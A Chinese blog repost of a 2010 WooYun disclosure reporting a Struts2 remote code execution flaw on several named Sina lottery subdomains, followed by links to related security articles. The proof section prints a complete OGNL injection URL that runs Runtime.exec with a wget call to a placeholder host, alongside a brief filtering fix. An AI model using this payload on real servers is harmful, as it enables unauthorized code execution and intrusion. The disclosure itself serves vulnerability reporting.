新浪网存在远程执行漏洞

最新推荐文章于 2024-10-15 10:20:47 发布
最新推荐文章于 2024-10-15 10:20:47 发布
阅读量236 收藏
点赞数
文章标签: web安全 安全 hack 网络安全 wooyun
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124093601
版权

漏洞详情

披露状态:

2010-07-16: 细节已通知厂商并且等待厂商处理中
2010-08-18: 细节向公众公开

简要描述:

新浪网可以远程执行代码,可能造成网站被入侵。

详细说明:

使用struts2的任意产品线,在默认配置情况下会导致任意java代码能够以webserver的权限执行。
如下url存在代码执行漏洞
http://caipiao.sc.sina.com.cn/cbportal/userinfo/showRegister.action
http://caipiao.fj.sina.com.cn/sp1/act/chartmall.chart.action
http://caipiao.henan.sina.com.cn/cbportal/userinfo/showRegister.action

漏洞证明:

http://caipiao.fj.sina.com.cn/sp1/act/chartmall.chart.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('\u0023rt.exec(%22/usr/bin/wget ip:port%22)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

修复方案:

由于官方尚无补丁,且此漏洞主要针对框架攻击,因此建议在ParameterInterceptor中,过滤掉含有\()@等漏洞利用所必须字符的参数。

Sword-heart
关注
WEB漏洞——SSRF
qq_63594215的博客
04-11 833
这次来介绍WEB漏洞的其中一种类型SSRF,文章将通过讲述其原理、如何挖掘以及怎么利用,包括如何防御和绕过,并且提供靶场来举例说明,详情请往下看。社交分享功能:获取超链接的标题等内容进行显示转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览在线翻译:给网址翻译对应网页的内容图片加载/下载:例如富文本编辑器中的点击下载图片到本地;通过URL地址加载或下载图片云服务厂商:它会远程执行一些命令来判断网址是否存活等,所以如果可以捕获相应的信息,就可以进行ssrf测试。
python远程文件管理系统_python 读取远程服务器文件
weixin_39967598的博客
12-20 1056
几个提高工作效率的Python内置小工具在这篇文章里,我们将会介绍4个Python解释器自身提供的小工具。这些小工具在笔者的日常工作中经常用到,减少了各种时间的浪费,然而,却很容易被大家忽略。每当有新来的同事看到我这么使用时,都忍不住感叹,原来Python还隐藏了这么好用的功能。下面就来看一下Python自带的几个小工具一、1秒钟启动...文章青衫无名2018-03-161879浏览量如何为 Py...
新浪XSS漏洞
swordheart的博客
04-14 131
漏洞详情 披露状态: 2010-07-23: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-23: 细节向公众公开 简要描述: 新浪的一个XSS 详细说明: 攻击者利用应用程序的动态展示数据功能,在html页面里嵌入恶意代码。当用户浏览该页之时,这些嵌入在html中的恶意代码会被执行,用
发现新浪一注册漏洞
编程视觉
06-06 617
目前偶尔靠运气能出有验证码的wangy
新浪某频道存在sql注入漏洞
swordheart的博客
04-12 989
漏洞详情 披露状态: 2010-07-20: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-19: 细节向公众公开 简要描述: 新浪某频道存在sql注入漏洞,较简单的利用方式 详细说明: 存在于新浪财经,未完全检查,应该不止以下几处,请自行测试 漏洞证明: http://money.
搜狐通行证某处反射xss
swordheart的博客
04-12 137
漏洞详情 披露状态: 2010-07-16: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-18: 细节向公众公开 简要描述: 搜狐通行证某处反射xss 详细说明: 登录后状态下 http://passport.sohu.com/web/updateInfo.action?modifyT
网络安全预警通报:更新微软远程代码执行漏洞补丁
weixin_44052945的博客
01-17 1453
新浪数码讯1月17日下午消息,北京网络与信息安全信息通报中心通报,近日,微软公司(MicroSoft)官方发布了三个远程代码执漏洞安全更新补丁。其中包括Microsoft Exchange软件的内存破坏导致远程代码执行(漏洞编号CVE-2019-0586)、Microsoft Word 内存破坏导致远程代码执行(漏洞编号CVE-2019-0585)、Windows DHCP存在远程代码执行漏洞...
Web应用安全漏洞分析
12-01
针对Web应用的漏洞,如Struts2远程命令执行漏洞,具有极高的风险性,因为它允许攻击者远程执行系统命令,控制整个Web应用。这一漏洞直接影响了使用Struts2框架的多个大型网站,包括政府和金融网站等,导致了广泛的...
(渝粤教育)网络教育远程教育统考计算机应用基础复习题
渝粤题库
05-07 4498
正确答案:详见左边【渝粤教育】公众号 _______服务器会自动把域名地址解析为IP地址。 A.HTTP B.DNS C.FTP D.SMTP ______包括体积、 存储容量、 输入输出能力。 A.计算机处理数据的方式 B.计算机的规模和处理能力 C.计算机的使用范围 D.计算机使用的电子器件 ______包括体积、 存储容量、...
20194307肖江宇Exp5—信息搜集与漏洞扫描
MYRLY的博客
04-21 340
20194307肖江宇Exp5—信息搜集与漏洞扫描 一、实践目标 掌握信息搜集的最基础技能与常用工具的使用方法 各种搜索技巧的应用 DNS IP注册信息的查询 基本的扫描技术:主机发现、端口扫描、OS及服务版本探测、具体服务的查点(以自己主机为目标) 漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞(以自己主机为目标) 二、实践内容 1. 各种搜索技巧的应用 (1) 搜索网址目录结构 msfconsole use auxiliary/scanner/http/dir_scanner set THR
新浪微博的XSS漏洞攻击过程详解
weixin_34294649的博客
07-11 1439
今天晚上(2011年6月28日),新浪微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如:“郭美美事件的一些未注意到的细节”,“建 党大业中穿帮的地方”,“让女人心动的100句诗歌”,“3D肉团团高清普通话版种子”,“这是传说中的神仙眷侣啊”,“惊爆!范冰冰艳照真流出了”等等 微博和私信,并自动关注一位名为hellosamy的用户。 事件的经过线索如下: 20:14,开始有大量带V...
密码找回逻辑漏洞总结
swordheart的博客
04-24 1352
0x00 背景介绍 请注意这两篇文章: 密码找回功能可能存在的问题 密码找回功能可能存在的问题(补充) 距离上两篇文档过去近半年了,最近整理密码找回的脑图,翻开收集的案例,又出现了一些新的情况,这里一并将所有见到的案例总结并分享给大家,在测试时可根据这个框架挖掘! 0x01 密码找回逻辑测试一般流程 首先尝试正常密码找回流程,选择不同找回方式,记录所有数据包 分析数据包,找到敏感部分 分析后台找回机制所采用的验证手段 修改数据包验证推测 0x02 脑图 0x03 详情 用户凭证暴力
新浪微博XSS攻击代码简要解析
晨光满苑
06-28 2639
 代码下载(来源游侠安全网) /** *使用AJAX创建XMLHttpRequest对象,若不是IE浏览器,使用XMLHttpRequest创建XHR对象, *否则使用ActiveXObject创建XHR对象。 */function createXHR(){ return window.XMLHttpRequest? new XMLHttpRequest():
Fastjson远程命令执行漏洞总结
weixin_42345596的博客
08-05 3555
一.FastJson 简介 fastjson.jar包原始下载地址:https://github.com/alibaba/fastjson fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。fastjson.jar是阿里开发的一款专门用于Java开发的包,可以方便的实现json对象与JavaBean对象的转换,实现JavaBean对象与json字符串的转换,实现json对象与json字符串的转换。除了这个fastjson以外,还有Google开
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
10-10 1394
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
10-15 752
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全的全面指南
qq_42568323的博客
10-09 1263
网络安全是指保护计算机网络及其数据免受未经授权访问、攻击或破坏的过程。其目标是确保信息的机密性、完整性和可用性。
2024年网络安全进阶手册:三个月黑客技术自学路线
2401_85027336的博客
10-12 1136
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
Dubbo远程执行漏洞修复建议:升级到最新安全版本
资源摘要信息:"Apache Dubbo远程代码执行漏洞(CVE-2021-43297)是Apache Dubbo框架中存在的一个安全漏洞,该漏洞允许攻击者远程执行任意代码。Dubbo是阿里巴巴开源的一款高性能Java RPC框架,广泛用于构建分布式应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值